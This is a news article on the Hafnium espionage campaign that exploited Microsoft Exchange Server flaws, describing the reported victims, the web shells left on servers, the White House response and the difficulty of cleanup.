Microsoft Hack: Chinese espionage targeting email servers spooks White House
What's the story
A state sponsored Chinese hacking group dubbed as Hafnium has compromised Microsoft's business email software.
Microsoft estimates at least 60,000 known global victims, with Chinese hackers managing to exploit a critical flaw in Microsoft Exchange Server to siphon off emails and even achieve remote control over infected systems.
Thus far, victims of the cyber-espionage attack range from government agencies to small and medium-sized businesses.
Automated attacks
Chinese hackers ramped up attacks after Microsoft issued patches
The cyber-attack come to light on March 2, when Microsoft released emergency security updates to plug the security hole in Exchange Server versions 2013 through 2019.
However, the Chinese hackers ramped up their attacks at a much faster rate than businesses and government agencies could patch their systems.
This rapid escalation drew the concern of US national security officials and the White House itself.
Puppet masters
Hackers inject compromised systems with 'web shell' providing easy backdoor
The cyber attacks have left hundreds of thousands of Microsoft Exchange servers with a "web shell," which is a password-protected tool Chinese hackers can use remotely from anywhere in the world.
After Microsoft's announcement last Tuesday, the hackers have automated the processes of seeking out unpatched systems to infect and cast their nets wider. This has allowed the hackers to stay one step ahead.
Casting a wide net
Cyberattacks were indiscriminate initially, but began targeting valuable assets later
Prima facie, the indiscriminate targeting of businesses might seem random, however that's a clever strategy used by the Chinese to infect as many systems as possible before evaluating them for valuable intelligence information.
This allows the Chinese to identify valuable assets such as defense contractors, infectious disease researchers, government agencies, and other organizations carrying intelligence vital to scientific, industrial, and business applications.
Justifiably spooked
White House emphasizes the far-reaching impact of the cyberattacks
White House press secretary Jen Psaki emphasized that the vulnerabilities discovered thus far were "significant" and "could have far-reaching impacts". Microsoft's email software is widely used by Western government agencies and businesses alike.
KrebsOnSecurity's analysis reveals the presence of hacking backdoors on critical US organizations spanning banks, credit unions, telecom providers, public utilities, police, and fire rescue units.
Details
Installing patching does not eject hackers out of infected networks
To make matters worse, businesses cannot eject hackers out of their systems by simply patching their instance of Microsoft Exchange Server. Once infected, each node in the organization will require exhaustive diagnosis and cleanup. This process can take months for most organizations.
The Chinese hackers are quite likely siphoning off emails indiscriminately, which allows them to mine valuable data at a later date.